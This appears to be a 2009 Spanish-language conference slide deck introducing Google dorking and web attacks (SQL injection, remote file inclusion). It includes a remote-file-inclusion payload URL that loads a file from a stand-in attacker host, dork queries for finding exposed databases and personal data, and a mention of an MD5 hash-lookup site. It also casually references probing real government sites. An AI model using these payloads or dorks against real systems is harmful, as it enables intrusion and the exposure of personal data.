Publicado el 12 de Abril del 2018
425 visualizaciones desde el 12 de Abril del 2018
1.009,8 KB
19 paginas
Creado hace 14a (17/08/2009)
Hacking And Beers
Por
Arturo zamora
0o_zeus_o0
About
Arturo zamora
Residencia:estado de puebla
Enfoque: vulnerabilidades web
Sitio web: www.securitybroken.com
Works: Bancos, empresas de seguridad
informática e instituciones de gobierno
Familiarizado con ataques web deteccion
y prevención
Hacking And Beers
● Como se relacionan las chelas con el hacking
● Usandolas como herramientas en una noche
de trabajo xD
● En que se parecen las vuln a las cervezas y a
que tipo de cervezas
Hacking en diferentes tipos de
aplicaciones
● Probando bugs en % 0 a % 14
● Cual es el ataque mas efectivo
Google Hacking
Que funciones tenemos???
Algunas funciones ayudan para buscar un archivo en especifi co ,
tipo de extencion , nombre en el
titulo , nombre dentro de la url , algún archivo libre, nombre o
simplemente carpetaque o archivo
dentro de carpeta.
Esto nos ayuda mucho ya que podemos encontrar base de datos
en Access, sql o backups :p,,
también datos de una persona X.
Google Hacking
Las funciones mas comunes serian
Filetype: qué tipo de extensión deseamos buscar (mp3, txt, mdb,
sql, php, asp, etc)
Allintext: nos hace mal fácil buscar una palabra o frase (powered
by **) wii!!
Intitle, Allintitle: podemos buscar un titulo en particular del sitio
( haxorz xD)
Inurl, Allinurl: mi favorito :p nos hace un listado de que archivo
estamos buscando , muy efi caz
para ataques web a cms :p
Site: también efi caz, ejemplo… site: .gov.ar
Google Hacking
Pero no crean que estos son todos, hay otros mas que puede ser
que no me los sepa ya que no soy
un experto en sacar provecho a google
Allinanchor: nos sirve para buscar palabras en especifi co
author: buscamos dependiendo del nombre o mail de la persona
autora :p
Cache: este es mas claro que el agua.. preguntas ¿? xD
ext: es como inurl pero para fi letype :p
Jeopardy google por una chela
● Como podemos sacar una extensa lista de
correos , teléfonos y nombres de personas??
● Como buscar el nombre de un archivo junto
con su extensión
● Que comando en google podemos usar para
ver errores web o contenido de carpetas con
información sensible
Jeopardy Google por una chela
● Que hacemos si encontramos un usuario pero
su contraseña esta encriptada en md5
● A quien le debemos esta gran sabiduría?
● xDDDDD
ATAQUES WEB
● Los ataques web hoy en día son cosa muy
comunes ya que casi la mayoría de sitios
tienen errores , los mas comunes son en los
sitios de gobierno ya que no les dan la
suficiente atención y son los mas codiciados
por los “DEFACERS” o atacantes
ATAQUES WEB
● Tenemos muchos ataques existentes hoy en
día pero uno de los mas comunes que hay son
los sql inyección, este ataque lo que realiza son
peticiones a la base de datos para que nos
muestre información confidencial un ejemplo
seria algo como esto
ATAQUES WEB
● 1 IMG
ATAQUES WEB
● 1 IMG
ATAQUES WEB
● Remote file inclusión nos ayuda a acceder a un
archivo de manera remota mediante un archivo
php con la facilidad de ejecutar comandos via
url, este ataque como su nombre lo dice es
usar un archivo de manera remota ejem
● index.php?1=http://niñomalo.com/sujugete.txt?
● Y nos daría algo asi
ATAQUES WEB
PREGUNTAS???
● QUIEREN SABER MAS SOBRE ATAQUES
WEB? O SOBRE GOOGLE HACKING?
SITIOS USADOS
● http://gdataonline.com/seekhash.php
http://google.com.mx
● Un .gov.ar
● Y otro de mexico
●
Despedida
● Visiten www.securitybroken.com
●
● Y www.diosdelared.com
●
● Sitios que cuentan con contenido original hecho
por sus usuarios
Agradecimientos
● Zer0-zo0rg, Pandora, Murder, hkm, nitrous,
tunich, Iris O. Mi nena mosha
Comentarios de: Hacking and Beers (0)
No hay comentarios